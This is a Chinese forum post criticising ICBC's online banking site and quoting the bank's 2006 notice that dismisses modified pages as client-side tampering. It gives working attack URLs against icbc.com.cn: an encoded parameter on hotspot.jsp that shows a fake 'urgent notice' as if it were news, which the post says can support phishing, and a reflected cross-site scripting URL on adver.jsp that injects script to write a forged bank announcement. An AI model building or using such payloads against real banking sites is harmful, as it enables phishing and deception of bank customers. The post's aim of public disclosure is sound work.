承认错误真的很难
工商网站的笑话最近比价流行,工行虽然对hotspot的漏洞做了屏蔽,但是漏洞没有吗?不,漏洞依然存在,虽然不在出现工行页面,但是由于使用的是工行的官方页面,所以只需要构造一个页面用来伪装工行页面,该页面仍然可以钓鱼.
工行网站出现非常低级的漏洞,会导致用户被欺骗,有一位专家说这是常见的Bug,对工行网银安全不会存在任何威胁。
首先请确认工行官方网址:[url]http://www.icbc.com.cn[/url]
输入以下连接地址
“[url]http://www.icbc.com.cn/news/hotspot.jsp?column=[/url]工行紧急通知:工行新闻系统出现严重漏洞,小心被骗”
经过编码后的地址会让人觉得是一个真实的新闻
[url]http://www.icbc.com.cn/news/hotspot.jsp?column=%B9%A4%D0%D0%BD%F4%BC%B1%CD%A8%D6%AA%A3%BA%B9%A4%D0%D0%D0%C2%CE%C5%CF%B5%CD%B3%B3%F6%CF%D6%D1%CF%D6%D8%C2%A9%B6%B4%A3%AC%D0%A1%D0%C4%B1%BB%C6%AD[/url]
虽然从文件名上来看像是最近流行的一个搞笑的东西,但是作为一个重要的金融机构的官方网站上出现这样东西是很危险的,所以这个漏洞非常低级.
---------------------
关于提示注意个别不法分子恶意修改并非法传播的通告
近日,我行发现个别不法分子将工行网页下载并存储在自己电脑后进行页面信息修改、拷贝后在某些网上论坛进行传播。对恶意修改我行网站的行为,我行表示谴责并保留进一步追究其责任的权利,同时提醒广大客户,这种在客户端的页面修改并没有对我行网站进行页面修改,我行网站安全没有受到任何影响,望大家放心使用工行网上银行,注意防范风险,不要随意传播非法链接及修改后的页面。
中国工商银行
2006年12月31日
---------------------
 |
 |
社区:
http://www.icbc.com.cn/click/adver/adver.jsp?para=javascript:test()";function%20test(){document.write('%3Cbr%3E%3Ch1%3E%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%B9%AB%B8%E6%3C%2Fh1%3E2007%C4%EA1%D4%C23%C8%D5%A3%AC%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%CE%AA+51CTO+%D4%DE%D6%FA%C8%CB%C3%F1%B1%D2500000000000000000000000000000000000000000%CD%F2%A3%AC%CC%D8%B4%CB%CD%A8%D6%AA%A1%A3%3Cbr%3E')}//